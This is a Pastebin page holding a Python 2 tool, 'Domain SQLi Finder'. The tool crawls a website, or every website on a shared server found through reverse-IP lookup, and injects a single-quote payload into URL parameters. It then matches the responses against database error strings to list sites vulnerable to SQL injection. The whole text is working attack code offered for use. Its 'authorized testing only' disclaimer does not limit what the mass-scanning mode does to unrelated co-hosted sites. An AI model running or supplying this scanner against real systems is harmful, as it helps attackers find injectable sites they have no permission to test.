Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <script src="//my.hellobar.com/d47b5e9fed3fd1926808aefff5134faac871bb04.js" type="text/javascript" charset="utf-8" async="async"></script>#!/usr/local/bin/python2.7
- # This was written for a Penetration Test assessment and is for educational purpose only. Use it at your own risk.
- # Author will be not responsible for any damage!
- # Intended for authorized Web Application Pen Testing only!
- import chilkat, sys, os, argparse, httplib, urlparse, urllib2, re, time, datetime
- import DomainReverseIPLookUp
- # The following three variables get their values from command line args, either take user value or stick with the default ones
- pagesToCrawl = "" # Number of pages to crawl in a website
- maxVulInjectableParam = "" # Maximum number of vulnerable pages (parameters) to find
- output = "" # Output file name - append mode (a)
- reverseLookUp = "DSQLiReverseLookUp.txt" # Output file name for reverseIP lookup - write+ mode (w+)
- crawlDump = 'DSQLiCrawlerOutput.txt' # Stores crawling result for current crawl only - write+ mode (w+)
- uniqueLinksDump = 'DSQLiUniqueLinks.txt' # Stores crawling result for current scan only - write+ mode (w+)
- errorDump = 'DSQLiErrorDump.txt' # Dumps handled errors - append mode (a)
- sitesToScan = "" # Stores maximum number of sites to scan on domain in case of Mass-Mode Attack
- maxVulSites = "" # Stores maximum number of vulnerable sites to find with Mass-Mode Attack
- reverseFlag = 0 # Determines whether reverseLookUp file is generated by script or user supplies it
- maxVulSitesFlag = 0 # Keeps track of how many vulnerable sites have been found in Mass-Mode Attack
- verbose = 0 # Determines what messages to display on screen (0 or 1)
- sqlPayload = ["1'"] # SQL Payloads, add in more here
- sqlErrors = [
- "Warning",
- "mysql_fetch_array()",
- "mysql_fetch_object()",
- "mysql_num_rows()",
- "mysql_free_result()",
- "mysql_real_escape_string()",
- "mysql_connect()",
- "mysql_select_db()",
- "mysql_query()",
- "You have an error in your SQL syntax",
- "Unclosed quotation mark after the character string",
- "Server Error in '/' Application",
- "Microsoft OLE DB Provider for ODBC Drivers error",
- "supplied argument is not a valid OCI8-Statement",
- "microsoft jet database engine"
- ] # add in more here
- # Determine platform and clear screen
- def clear_screen():
- if sys.platform == 'linux-i386' or sys.platform == 'linux2' or sys.platform == 'darwin':
- os.system('clear')
- elif sys.platform == 'win32' or sys.platform == 'dos' or sys.platform[0:5] == 'ms-dos':
- os.system('cls')
- else:
- pass
- # Banner - Set the formatting mororn, it's fucked up atm
- def banner():
- print """
- ##################################################################
- Domain SQLi Finder - (Error Based Tool-v0.1)
- b0nd@garage4hackers.com
- Greetz to:
- (www.garage4hackers.com)
- GGGGGG\
- GG __GG\
- GG / \__| aaaaaa\ rrrrrr\ aaaaaa\ gggggg\ eeeeee\
- GG |GGGG\ \____aa\ rr __rr\ \____aa\ gg __gg\ ee __ee\
- GG |\_GG | aaaaaaa |rr | \__|aaaaaaa |gg / gg |eeeeeeee |
- GG | GG |aa __aa |rr | aa __aa |gg | gg |ee ____|
- \GGGGGG |\\aaaaaaa |rr | \\aaaaaaa |\ggggggg |\\eeeeeee\
- \______/ \_______|\__| \_______| \____gg | \_______|
- gg\ gg |
- gggggg |
- \______/
- Usage: python Domain-SQLi-Finder.py -h
- ###################################################################
- """
- print "\tUsage: python %s [options]" % sys.argv[0]
- print "\t\t-h help\n"
- call_exit()
- def call_exit():
- print "\n\tExiting ...........\n"
- sys.exit(0)
- # Tests SQLi on all unique links and parameters by appending sqlPayload and checking the source
- def check_SQLi(uniqueUrls):
- sqliUrls = [] # This list will contain sorted URLs ready to be appended with sqlPayloads
- flag = 0 # Variable to check whether desired 'n' number of vulnerable pages have been found
- for link in uniqueUrls: # This list has all unique URLs but since a single unique URL might have multiple parameters
- num = link.count("=") # so this loop prepares URLs with one parameter each
- if num > 0:
- for x in xrange(num):
- x = x + 1
- url = link.rsplit("=",x)[0]+"="
- sqliUrls.append(url)
- sqliUrls = list(set(sqliUrls)) # By now this list has all injectable parameters ready to append sqlPayload
- parsed = urlparse.urlparse(link) # Later used to obtain website name
- now = datetime.datetime.now() # Current time of scanning to put in DSQLiResults output file
- try:
- fd_output = open(output, 'a')
- fd_output.write("\n\tTarget Site =>\t" + parsed.netloc + "\t(" + (now.strftime("%Y-%m-%d %H:%M")) + ")\n") # Writing URL base name to output file
- except IOError:
- print "\n\t[!] Error - could not open|write file %s \n" % output
- if verbose == 1:
- print "\n[*] Testing SQLi on following URLs:"
- for link in sqliUrls:
- print "\t[-] URL: ", link
- else:
- print "\n[*] Testing SQLi on URL's ....."
- # In the following loop, the counter flag plays role to find 'n' number of vulnerable pages. If limited number of pages
- # have to be found, the value of flag counter determines whether script has found those number of pages or not. Once matches,
- # it breaks all loops and come out. Else, if it has not touched the limit but links in sqliUrls have finished, control comes
- # out of all loops. But if (0) i.e. all pages have to be found, flag plays no considerable role other than incrementing itself.
- for link in sqliUrls:
- for pload in sqlPayload:
- if verbose == 1:
- print "\n\n\tTesting: %s\n" % (link+pload)
- try:
- source = urllib2.urlopen(link+pload).read() # Appending sqlPayload and reading source for errors
- except urllib2.HTTPError, err:
- if err.code == 500:
- if verbose == 1:
- print "\t\t[!] Error - HTTP Error 500: Internal Server Error"
- print "\t\t[-] Continuing with next link"
- continue
- else:
- if verbose == 1:
- print "\t\t[!] Error - HTTP Error xxx"
- print "\t\t[-] Continuing with next link"
- continue
- for errors in sqlErrors:
- if re.search(errors, source) != None: # If any sql error found in source
- fd_output.write("\t\t[!] BINGO!!! SQLi Vulnerable " + link+pload + "\n")
- print "\n\t\t[!] BINGO!!! - SQLi FOUND in: %s (%s) \n" % (link+pload, errors)
- if maxVulInjectableParam != 0: # i.e. if 'n' number of vulnerable parameters have to be found
- if flag < maxVulInjectableParam:
- flag = flag + 1
- else:
- break
- else: # i.e if all vulnerable pages have to be found
- flag = flag + 1
- break
- else:
- if verbose == 1:
- print "\t\t[-] Not Vulnerable - String (%s) not found in response" % errors
- else:
- pass
- if maxVulInjectableParam != 0 and flag == maxVulInjectableParam: # i.e. if 'n' pages have already been found
- break
- if maxVulInjectableParam != 0 and flag == maxVulInjectableParam: # i.e. if 'n' pages have already been found
- break
- if flag != 0:
- print "\n\t[-] Target is vulnerable to SQLi, check log file"
- print "\t\t[-] %d injectable vulnerable parameters found" % (flag)
- global maxVulSitesFlag
- maxVulSitesFlag = maxVulSitesFlag + 1 # Increment the flag which determines how many vulnerable sites to find in case of Mass-Mode Attack
- else:
- print "\n\t[-] Target is not vulnerable to SQLi"
- try:
- fd_output.write("\t\tTarget is not vulnerable to SQLi attack\n")
- fd_output.close() # Close the file on completion of each URL, so that log file could be seen for
- except IOError: # result instantly, instead of waiting for whole script to finish
- print "\n\t[!] Error - file I/O error\n"
- try:
- fd_output.close()
- except IOError:
- pass
- # Just finds the unique URLs from all crawled URLs and saves to list
- # Concept is: Parse the URL, find its injectable parameter(s), check the combination of [netlock, path and injectable parameters] with earlier found
- # combinations, if unique, update our uniqueUrls list else goto next URL and parse it for same procedure
- def unique_urls(unsortedUrls):
- print "\n[*] Finding unique URL's ....."
- list_db = [] # Used as temporary storage to compare parameters with already found ones
- uniqueUrls = [] # This one will finally have unique URLs in it
- for link in unsortedUrls:
- list_tmp = [] # Temporary list to store query parameters only
- try:
- parsed = urlparse.urlparse(link)
- num = parsed.query.count("=") # Just checking the parsed.query portion for number of injectable parameters it has
- x = 0
- for x in xrange(num):
- list_tmp.append(parsed.query.split("&")[x].rsplit("=",1)[0]) # list_tmp would have all injectable parameters in it as elements
- x = x + 1
- except IndexError:
- # In my case links generate error bcoz they include an external URl and increase the number of "=" in link.
- # accordingly the loop run 1 extra time and generates out of index error
- if verbose == 1:
- print "\n\t[!] Error - List Index Out of Order - check %s and report to author" % (errorDump)
- try:
- fd_errorDump = open(errorDump, 'a')
- fd_errorDump.write("\n\t[*] Error occured inside unique_urls function for:\t" + parsed.query)
- except IOError:
- print "\n\t[!] Error - could not open|write file %s \n" % errorDump
- continue
- list_tmp = [parsed.netloc, parsed.path, list_tmp]
- if list_tmp in list_db: # For the first URL, this condition would definitely fail as list_db is empty
- continue # i.e. same parameters but with different values have been found, so continue
- else:
- list_db.append(list_tmp) # Update the found unique parameters
- uniqueUrls.append(link) # Update the List with unique complete URLs
- if verbose == 1:
- for link in uniqueUrls:
- print "\t[-] Unique link found: ", link
- try:
- fd_uniqueLinkDump = open(uniqueLinksDump, 'a')
- for link in uniqueUrls:
- fd_uniqueLinkDump.write(link + '\n')
- fd_uniqueLinkDump.close()
- except IOError:
- print "\n\t[!] Error - could not open|write file %s \n" % uniqueLinksDump
- check_SQLi(uniqueUrls) # Call SQLi check function to test SQLi vulnerability
- # Function crawls to find "linksToCrawl" number of pages from URL.
- # It stops when limit reaches or no more pages left to crawl, which ever meets the condition first
- def crawl_site(url):
- print "[*] Attacking URL -> ", url
- print "\t[*] Crawling %s to find injectable parameters" % url
- spider = chilkat.CkSpider() # Using Chilkat Library. Some modules are free.
- spider.Initialize(url)
- spider.AddUnspidered(url)
- spider.CrawlNext()
- print "\n\t[-] Website Title: ", spider.lastHtmlTitle()
- print "\n\t[-] Crawling Pages", # The trailing comma to show progress bar in case of non-verbose
- crawlerOutput = [] # This list would have all the linksToCrawl number of pages of URL
- for i in range(0,int(pagesToCrawl)):
- success = spider.CrawlNext()
- if (success == True):
- if verbose == 1:
- if i%50 == 0:
- print "\n[-] %d percent of %d pages to crawl complete\n" % ((i*100)/pagesToCrawl, pagesToCrawl)
- print "\t", spider.lastUrl()
- else:
- sys.stdout.flush()
- print ".", # In non verbose case, it prints dot dot dot to show the progress
- crawlerOutput.append(spider.lastUrl())
- else:
- if (spider.get_NumUnspidered() == 0):
- print "\n\t[-] No more URLs to spider"
- i = i - 1 # Need to decrement, else gives +1 count for total pages crawled
- break
- else:
- print spider.lastErrorText()
- continue
- spider.SleepMs(10)
- try:
- fd_crawlDump = open(crawlDump, 'a') # Logs
- for link in crawlerOutput:
- fd_crawlDump.write(link + '\n')
- fd_crawlDump.close()
- except IOError:
- print "\n\t[!] Error - could not open|write file %s \n" % crawlDump
- print "\n\t[-] Crawled %d pages successfully" % (i+1)
- if verbose == 1:
- print "\n[*] Parsing URL's to collect links with '=' in them ....."
- urlsWithParameters = [] # This list would have only those URLs which has '=' in them i.e. injectable parameter(s)
- for link in crawlerOutput:
- if link.count("=") > 0:
- urlsWithParameters.append(link)
- if urlsWithParameters != []:
- if verbose == 1:
- print "\t[-] Done"
- unique_urls(urlsWithParameters) # Time to find unique URLs among all with '=' in them
- else:
- print "\n\t[!] No injectable parameter found"
- now = datetime.datetime.now() # Current time to put in DSQLiResults output file
- try:
- parsed = urlparse.urlparse(url)
- fd_output = open(output, 'a')
- fd_output.write("\n\tTarget Site =>\t" + parsed.netloc + "\t(" + (now.strftime("%Y-%m-%d %H:%M")) + ")\n") # Writing URL base name to output file
- fd_output.write("\t\tNo injectable parameter found\n")
- fd_output.close()
- except IOError:
- print "\n\t[!] Error - could not open|write file %s \n" % output
- # Function tries to find SQLi on sites on shared hosting
- def attack_Domain(durl):
- sites = []
- counter = 0 # This keeps check on how many sites have been scanned so far
- deadLinks = 0 # This keeps check on how many dead links have been found
- print "\n[*] Attacking Domain -> ", durl
- if reverseFlag == 0: # i.e. if --reverse switch is not used on console. That means, do reverseIP Lookup and generate result
- DomainReverseIPLookUp.generate_reverse_lookup(durl, reverseLookUp, verbose) # pass domain url, output file name and verbose level
- try:
- fd_reverseLookUp = open(reverseLookUp, 'r')
- for url in fd_reverseLookUp.readlines():
- sites.append(url) # List sites contains all the domains hosted on server
- except IOError:
- print "\n\t[!] Error - %s file missing" % reverseLookUp
- print "\t[-] Generate it using --reverse switch or get domains from some reverse IP lookup website"
- call_exit()
- elif reverseFlag == 1: # i.e. if --reverse switch is mentioned, then don't do reverse IP Lookup and read data from already generated file
- try:
- fd_reverseLookUp = open(reverseLookUp, 'r')
- for url in fd_reverseLookUp.readlines():
- sites.append(url) # List sites contains all the domains hosted on server
- except IOError:
- print "\n\t[!] Error - %s file missing" % reverseLookUp
- print "\t[-] Generate it using --reverse switch or get domains from some reverse IP lookup website"
- call_exit()
- if len(sites)%10 != 0:
- sites = sites[0:(len(sites)%10)]
- else:
- sites = sites[0:((len(sites)+2)%10)]
- for site in sites:
- try:
- print "\n\t#################################################"
- print "\n\t [-] Number of alive sites scanned so far: ", counter
- print "\n\t [-] Number of vulnerable sites found so far: ", maxVulSitesFlag
- print "\n\t [-] Number of dead sites found so far: ", deadLinks
- print "\n\t#################################################\n"
- if maxVulSites != 0: # i.e. if not all vulnerable sites are to be found
- if maxVulSitesFlag == maxVulSites:
- print "\n\t[-] Stopping scan - the required number of vulnerable sites have been found"
- break
- if site[:7] != "http://": # prepend http:// to url, if not already done by user
- site = "http://" + site # what about https site?
- site = site[:-1] # remove \n at the end of each element
- print "-"*80
- print "\n[*] Target URL - %s ....." % (site) # Verify URL for its existance
- if verify_URL(site) == True: # Function call to verify URL for existance
- print "\t[-] URL Verified\n"
- crawl_site(site) # Pass the site to crawl function
- else:
- print "\n\t[-] URL %s could not be verified, continuing with next target in list" % site
- deadLinks = deadLinks + 1
- continue
- except KeyboardInterrupt:
- decision = raw_input("\n\t[?] how do you want to proceed? [(C)ontinue with next target in list or (q)uit]: ")
- if decision == 'C' or decision == 'c':
- continue
- elif decision == 'q':
- print "\n[!] Error - user aborted"
- call_exit()
- else:
- print "\n\tEnjoy: oo=========> (|)"
- call_exit()
- counter = counter + 1 # Counting for only those sites which really got scanned
- # for those whose URLs couldn't be verified, not incrementing counter
- print "\n\n[*] Scanning Finished"
- print "\n\t[-] Total Number of vulnerable sites found in domain: ", maxVulSitesFlag
- print "\t[-] Check log file %s for result" % output
- # Function to verify URL is alive and accessible
- def verify_URL(url):
- good_codes = [httplib.OK, httplib.FOUND, httplib.MOVED_PERMANENTLY] # 200, 302, 301 respectively
- host, path = urlparse.urlparse(url)[1:3] # elems [1] and [2] - netloc and path
- try:
- conn = httplib.HTTPConnection(host)
- conn.request('HEAD', path)
- status = conn.getresponse().status
- conn.close()
- except StandardError:
- status = None
- return status in good_codes # Either 'True' or 'False'
- # Parse command line arguments, allowed combinations and mandatory values
- def parseArgs():
- parser = argparse.ArgumentParser(description = 'Domain SQLi Finder - Error Based Tool v0.1', epilog="Report bugs to b0nd@garage4hackers.com | www.garage4hackers.com")
- parser.add_argument('--verbose', nargs='?', dest='verbose', default=0, help='set verbosity [0 (default) : Off | 1 : On]', type=int)
- parser.add_argument('--output', metavar='output.txt', dest='siteOutput', default='DSQLiResults.txt', help='output file to store results in (default=DSQLiResults.txt)')
- group1 = parser.add_argument_group('Single-Mode Attack: Target One Site on Domain')
- group1.add_argument('--url', nargs=1, dest='URL', help='target site to find SQLi')
- group1.add_argument('--crawl', nargs='?', dest='crawl', default=500, help='number of pages to crawl (default=500)', type=int)
- group1.add_argument('--pages', nargs='?', dest='pages', default=0, help='number of vulnerable pages (injectable parameters) to find in site (default=0 i.e. all)', type=int)
- # Mind it - In group1 and group2, same paramters "crawl" and "pages" are used. So on console whether uses --crawl or --dcrawl,
- # they would update the same variable "crawl" and ultimately the global variable pagesToCrawl. Same goes for "pages"
- group2 = parser.add_argument_group('Mass-Mode Attack: Target All Sites on Domain')
- group2.add_argument('--durl', nargs=1, dest='DURL', help='target domain to find SQLi')
- group2.add_argument('--sites', nargs='?', dest='sites', default=0, type=int, help='number of sites to scan on domain (default=0 i.e. all)')
- group2.add_argument('--vulsites', nargs='?', dest='vulsites', default=0, type=int, help='number of vulnerable sites to find on domain (default=0 i.e. all possible)')
- group2.add_argument('--dcrawl', nargs='?', dest='crawl', default=500, type=int, help='number of pages to crawl in each site (default=500)')
- group2.add_argument('--dpages', nargs='?', dest='pages', default=0, type=int, help='number of vulnerable pages (injectable parameters) to find in each site (default=0 i.e. all)')
- group2.add_argument('--reverse', metavar='output.txt', nargs=1, dest='reverseLookUp', help='output file to store found sites on server and|or read Reverse IP Lookup results from file')
- args = parser.parse_args()
- # Check exclusiveness of options
- if (args.URL != None and args.DURL != None):
- print "\n\t[!] Error - Mutually exclusive options (--url, --durl)"
- call_exit()
- # Check existance of at least one option
- if (args.URL == None and args.DURL == None):
- print "\n\t[!] Error - No mode selected (--url, --durl)"
- call_exit()
- # Check if value is passed to args. e.g. --crawl without value would pass "None" to it and program would crash
- # all of these switches have default value, so user either don't mention them on command prompt or must put a value for them
- if (args.crawl == None or args.pages == None or args.sites == None or args.vulsites == None):
- print "\n\t[!] Error - Insufficient number of value(s) passed to argument(s)"
- call_exit()
- # Check to make sure numeral value of vulsites is less than sites and pages < crawl
- if args.sites < args.vulsites:
- print "\n\t[!] Error - kidding? --sites shall be > --vulsites\n"
- call_exit()
- elif args.crawl < args.pages:
- print "\n\t[!] Error - kidding? --(d)crawl shall be > --(d)pages\n"
- call_exit()
- # Check if switch --reverse is used with --durl only
- if ((args.URL != None) and (args.reverseLookUp != None)):
- print "\n\t[!] Error - '--reverse' switch goes with Mass-Mode (--durl) attack only"
- call_exit()
- global reverseLookUp # Declaring it here as it's been used couple of times in this fuction
- # Check verbosity (--verbose argument)
- if args.verbose != None: # It would be none only when mentioned without any value i.e. --verbose <no value>
- if args.verbose == 1: # and if that is the case, the global value of verbose is 0 already, so - verbose off
- print "\n[*] Verbose Mode On"
- global verbose # verbose global variable
- verbose = 1
- if args.URL != None: # Verbose mode for --url
- print "\t[-] Pages to crawl (default=500): ", (args.crawl)
- print "\t[-] Vulnerable injectable parameters (pages) to find in site (default=0 i.e. all): %d" % (args.pages)
- print "\t[-] Output file name: %s" % (args.siteOutput)
- if args.DURL != None: # Verbose mode for --durl
- print "\t[-] Number of sites to scan on domain (default=0 i.e all): ", (args.sites)
- print "\t[-] Number of vulnerable sites to find on domain (default=0 i.e. all possible): ", (args.vulsites)
- print "\t[-] Pages to crawl in each site (default=500): ", (args.crawl)
- print "\t[-] Vulnerable injectable parameters (pages) to find in each site (default=0 i.e. all): %d" % (args.pages)
- if args.reverseLookUp != None: # i.e. if on console the reverse.txt file names is mentioned
- print "\t[-] Reverse IP Look-up file needed to read domains from: %s" % (args.reverseLookUp[0])
- else:
- print "\t[-] Reverse IP Look-up output file: %s" % reverseLookUp
- print "\t[-] Final result output file: %s" % (args.siteOutput)
- else: # i.e. if value 0 is passed to --verbose
- print "\n[*] Verbose Mode Off"
- else: # i.e. verbose has None Value, it's been passed without value
- print "\n[*] Vebose Mode Off (by default)"
- # By this point, either of --url, --durl or --aurl switch is enable
- # Following assignments are for --url, --durl - see if you wish to put only relevant one and take rest in if args.DURL != None
- # It's OK with current "common" crawl and pages parameters. If I assign parameter separately for --url and --durl then first I
- # would need to define "dcrawl" and "dpages" and use them in combination with --durl
- global pagesToCrawl
- pagesToCrawl = args.crawl
- global maxVulInjectableParam
- maxVulInjectableParam = args.pages
- global output
- output = args.siteOutput
- global sitesToScan
- sitesToScan = args.sites
- global maxVulSites
- maxVulSites = args.vulsites
- # Single-Mode Attack (--url argument)
- if args.URL != None:
- if args.URL[0][:7] != "http://": # prepend http:// to url, if not already done by user
- args.URL[0] = "http://"+args.URL[0] # what about https site?
- print "\n[*] Verifying URL....." # Verify URL for its existance
- if verify_URL(args.URL[0]) == True: # Function call to verify URL for existance
- print "\t[-] URL Verified\n"
- crawl_site(args.URL[0]) # Goto the function which deals with 1 URL
- else:
- print "\n\t[-] URL cound not be verified."
- call_exit()
- # Mass-Mode Attack (--durl argument)
- elif args.DURL != None:
- if args.DURL[0][:7] != "http://":
- args.DURL[0] = "http://"+args.DURL[0]
- # reverseLookUp doesn't have default value, so if not mentioned on console, it will be None. If not None, that means user wants to read reverse look-up
- # which is already generated file, either using this code or copied from somewhere. In that case, i/p file must reside in same directory
- if args.reverseLookUp != None:
- reverseLookUp = args.reverseLookUp[0]
- global reverseFlag # Determines whether reverseLookUp file is generated by script or user supplies it
- reverseFlag = 1
- attack_Domain(args.DURL[0])
- else: # i.e. --reverse is not mentioned on command prompt. Our code shall generate one.
- print "\n[*] Verifying Domain - %s ....." % (args.DURL[0])
- if verify_URL(args.DURL[0]) == True:
- print "\t[-] Domain Verified\n"
- attack_Domain(args.DURL[0])
- else:
- print "\n\t[-] Domain cound not be verified."
- call_exit()
- def main():
- #clear_screen()
- if len(sys.argv) < 2:
- banner()
- parseArgs() # Parse command line arguments
- call_exit()
- # ---------------------------------------- Code execution starts here ------------------------
Add Comment
Please, Sign In to add comment